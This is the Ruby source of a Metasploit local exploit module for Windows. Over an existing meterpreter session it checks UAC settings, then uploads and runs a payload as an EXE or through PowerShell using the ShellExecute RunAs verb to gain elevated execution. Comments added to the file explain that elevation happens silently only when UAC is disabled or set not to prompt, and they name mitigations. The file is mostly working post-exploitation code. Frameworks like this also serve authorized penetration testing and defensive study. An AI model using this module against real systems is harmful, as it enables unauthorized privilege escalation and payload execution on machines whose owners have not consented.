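##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Local module that asks Windows to start the payload elevated through the
# ShellExecute "RunAs" verb, using an existing meterpreter session.
#
# Defensive note: nothing in this file defeats UAC. As the branches in
# #exploit show, elevation happens without interaction only when UAC is
# disabled or configured not to prompt (UAC_NO_PROMPT); in every other
# configuration the interactive user must approve a consent prompt. Keeping
# UAC enabled with prompting, and treating unexpected consent prompts as
# suspicious, are the mitigations this module's own logic points to.
class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Windows::Priv
  include Post::Windows::Runas

  # Registers the module metadata and the user-settable options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Windows Escalate UAC Execute RunAs',
      'Description'    => %q( This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. ),
      'License'        => MSF_LICENSE,
      'Author'         => [
        'mubix',     # Original technique
        'b00stfr3ak' # Added powershell option
      ],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Targets'        => [['Windows', {}]],
      'DefaultTarget'  => 0,
      'References'     => [
        ['URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html']
      ],
      'DisclosureDate' => 'Jan 3 2012'
    ))

    register_options([
      OptString.new('FILENAME', [false, 'File name on disk']),
      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
      OptBool.new('UPLOAD', [true, 'Should the payload be uploaded?', true]),
      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)])
    ])
  end

  # Reports the target's UAC state to the operator, then runs the payload with
  # the technique selected in the TECHNIQUE option.
  #
  # The UAC check is informational only: it decides which message is printed
  # and never stops or changes the execution that follows.
  #
  # @return [void]
  def exploit
    if is_uac_enabled?
      print_status 'UAC is Enabled, checking level...'
      case get_uac_level
      when UAC_NO_PROMPT
        # UAC is on here (we are inside the is_uac_enabled? branch), so the
        # message must not claim it is disabled; only the prompt is suppressed.
        print_good 'UAC is enabled but configured not to prompt, no prompt for the user'
      else
        print_status "The user will be prompted, wait for them to click 'Ok'"
      end
    else
      print_good 'UAC is not enabled, no prompt for the user'
    end

    # execute_exe / execute_psh are not defined in this file; presumably they
    # come from the Post::Windows::Runas mixin and handle payload generation
    # and naming. TECHNIQUE is an OptEnum limited to PSH and EXE, so no
    # fallback branch is provided.
    case datastore['TECHNIQUE']
    when 'EXE'
      execute_exe(datastore['FILENAME'], datastore['PATH'], datastore['UPLOAD'])
    when 'PSH'
      execute_psh
    end
  end
end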